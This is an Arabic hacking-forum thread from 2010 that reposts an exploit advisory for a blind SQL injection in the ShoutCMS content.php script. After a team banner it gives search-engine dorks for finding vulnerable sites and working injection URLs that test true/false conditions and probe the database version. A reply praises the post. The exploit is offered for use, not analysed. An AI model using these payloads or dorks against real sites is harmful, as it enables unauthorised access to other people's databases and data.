المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ShoutCMS (content.php) Blind Sql Injection Vulnerability



AtT4CKxT3rR0r1ST
02-02-2010, 12:06 AM
ShoutCMS (content.php) Blind Sql Injection Vulnerability (http://www.exploit-db.com/exploits/11305)




################################################## ##################
.:. Author : Zero Cold [[email protected]]

.:. Team : Sec Attack Team

.:. Home : www.sec-attack.com/vb

.:. Script : Shout! Script

.:. Vendor : http://www.mediashaker.com/index.php

.:. Bug Type : Blind Sql Injection

.:. Dork : [1] "Powered by Shout!"
[2] intitle:"Shout" inurl:"admindex.php"

################################################## ##################

===[ Exploit ]===

www.site.com/content.php?id=54+and+1=1 >>> True
www.site.com/content.php?id=54+and+1=2 >>> False


www.site.com/content.php?id=54+and substring(@@version,1,1)=4 >>> True
www.site.com/content.php?id=54+and substring(@@version,1,1)=5 >>> False



################################################## ##################

Greats T0: HackxBack & AtT4CKxT3rR0r1ST & SAD All My Friend & All Member Sec Attack

هاوي حنانك
02-02-2010, 02:47 PM
مجهووود راااائع ومميز مشكووووور وما قصرت

دمت في تألق وابداع